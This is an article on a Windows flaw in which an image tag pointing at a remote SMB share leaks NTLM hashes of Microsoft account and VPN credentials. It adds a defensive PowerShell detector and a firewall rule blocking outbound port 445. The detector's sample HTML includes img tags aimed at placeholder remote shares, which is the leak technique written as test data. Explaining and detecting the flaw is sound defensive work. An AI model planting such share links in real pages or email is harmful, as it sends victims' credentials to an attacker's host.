

Microsoft Account Passwords, VPN Credentials Leaked Due To Windows Flaw

 
All Windows versions have a flaw that leaks Microsoft account passwords and VPN credentials

If a Microsoft user is using a VPN (virtual private network) to browse the Internet, there is a chance that the user’s Microsoft account username and password or VPN credentials could be leaked. The cause is assumed to be the way Windows handles its old authentication procedures for shared network resources.

The exploit depends on an attacker inserting a link to an SMB resource (network share) inside a Web page or an email that is viewed in Outlook.

The attacker can disguise the link to their network share inside an image tag, putting a link to a share hosted on their own network in place of a proper image link.

When a user opens the link via Internet Explorer, Edge, or Outlook, their computer will automatically send their login credentials, even over the Internet, to authenticate against the criminal’s domain. This is due to the way Windows manages authentication for network shares.
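A defender can look for this pattern in stored mail or page bodies. The following is an added example, not code from the original post or from ValdikSS: a PowerShell function that lists resource-loading attributes pointing at a remote share. The function name, the sample HTML and the hosts in it are constructed for illustration.

```powershell
# Constructed sample body; hosts are placeholders, not real indicators.
$sampleHtml = @'
<p>Quarterly report attached.</p>
<img src="https://cdn.example.com/logo.png">
<img src="\\files.example.net\share\pixel.png" width="1" height="1">
<img src='file://files.example.net/share/banner.jpg'>
<img src="file:///C:/Users/Public/local.png">
<a href="https://example.com/help">Help</a>
'@

# Hypothetical helper: returns one object per attribute that references a
# remote share (UNC path or file:// URL that names a host).
function Find-RemoteShareReference {
    param([Parameter(Mandatory)][string]$Html)

    # Attributes that make a client fetch a resource. Only quoted values are
    # handled; unquoted attribute values are out of scope for this sketch.
    $attrPattern = '(?i)<(?<tag>[a-z0-9]+)\b[^>]*?\b(?<attr>src|href|background)\s*=\s*(?<q>["''])(?<url>.*?)\k<q>'

    # \\host\... or file://host/... or file:////host/...
    # file:///C:/... has no host part and is not matched.
    $sharePattern = '^(?:\\\\|file:(?://|////))(?<h>[^\\/:]+)[\\/]'

    foreach ($m in [regex]::Matches($Html, $attrPattern)) {
        $url = $m.Groups['url'].Value.Trim()
        if ($url -match $sharePattern) {
            [pscustomobject]@{
                Tag        = $m.Groups['tag'].Value
                Attribute  = $m.Groups['attr'].Value
                RemoteHost = $Matches['h']
                Url        = $url
            }
        }
    }
}

# Reports the two share references and ignores the https and local-file ones.
Find-RemoteShareReference -Html $sampleHtml | Format-Table -AutoSize
```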

Even though the Microsoft account password is not leaked in cleartext, it is sent as an NTLM hash, and researchers demonstrated a long time ago that these could be easily cracked.

This isn’t new: Microsoft and the research community have known about this issue since 1997, and it has often been discussed at security conferences such as Black Hat.

This was not an issue in the past, as Windows accounts used machine-local usernames and passwords. However, starting with Windows 8, Microsoft allowed users to log in to their computers with Microsoft accounts. By the time Windows 10 was out, this had become the de facto standard login method, meaning that it was used by more users.

In recent years, Microsoft has begun to associate all its online services with the user’s same Microsoft account. This old attack now allows a crook to access credentials for Microsoft accounts, which in turn will also grant them indirect entry to all kinds of services like Skype, OneDrive, Xbox, Bing, MSN, Office 360, Azure, and more, says ValdikSS from Prosto VPN.

To make things worse, the user’s VPN credentials are leaked if the user is on a VPN connection when the fraudulent SMB resource is loaded. This allows the crook to access the victim’s VPN account.

“Microsoft successfully fixed some issues, some other issues were half-fixed, and another ones are not fixed at all and could be exploited up to this day,” ValdikSS explains. “The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones.”

Users can protect themselves against such attacks by blocking all outgoing SMB connections (port 445) via the Windows firewall, except for local networks, ValdikSS says. However, the best solution against such an attack would be to not use your Microsoft account to log into your Windows PC.
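One way to apply the firewall mitigation described above, as an added example that is not from the original post. Windows Firewall block rules take precedence over allow rules, so "block except local networks" is written as a block rule whose remote addresses are the non-local ranges. The rule name and the choice of what counts as "local" are assumptions.

```powershell
# Run in an elevated PowerShell session.
# Assumption: "local networks" means RFC 1918 private space (10/8, 172.16/12,
# 192.168/16), loopback (127/8) and link-local (169.254/16). Adjust the list
# if your LAN uses other ranges. IPv4 only; IPv6 would need its own rule.
$ruleName = 'Block outbound SMB to non-local addresses'   # hypothetical name

# IPv4 unicast space with the local ranges above left out.
$nonLocal = @(
    '1.0.0.0-9.255.255.255',
    '11.0.0.0-126.255.255.255',
    '128.0.0.0-169.253.255.255',
    '169.255.0.0-172.15.255.255',
    '172.32.0.0-192.167.255.255',
    '192.169.0.0-223.255.255.255'
)

# Create the rule only once so the script can be re-run safely.
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName `
        -Direction Outbound -Action Block `
        -Protocol TCP -RemotePort 445 `
        -RemoteAddress $nonLocal `
        -Profile Any | Out-Null
}

# Show what is actually in force: state, port and address scope of the rule.
Get-NetFirewallRule -DisplayName $ruleName |
    Select-Object DisplayName, Enabled, Direction, Action,
        @{ n = 'RemotePort';    e = { ($_ | Get-NetFirewallPortFilter).RemotePort } },
        @{ n = 'RemoteAddress'; e = { ($_ | Get-NetFirewallAddressFilter).RemoteAddress -join ', ' } } |
    Format-List
```

Connections to file servers on the listed private ranges keep working because the default outbound policy still allows them.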
